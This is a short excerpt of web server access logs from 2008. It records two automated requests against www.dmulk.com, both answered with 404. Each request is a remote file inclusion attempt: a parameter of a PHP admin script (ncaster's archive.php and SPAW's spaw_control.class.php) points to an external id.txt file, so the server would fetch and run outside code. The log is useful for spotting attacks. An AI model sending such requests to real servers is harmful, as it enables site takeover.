64.22.89.194 - - [07/Aug/2008:09:38:58 -0700] "GET /logs/ncaster/admin/addons/archive/archive.php?adminfolder=http://madebymantila.yoll.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
77.90.20.2 - - [07/Aug/2008:09:39:10 -0700] "GET /logs/access_080110.log//admin/spaw/spaw_control.class.php?spaw_root=http://www.geocities.com/ardian.saputtra/id.txt? HTTP/1.1" 404 275 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)" "www.dmulk.com"
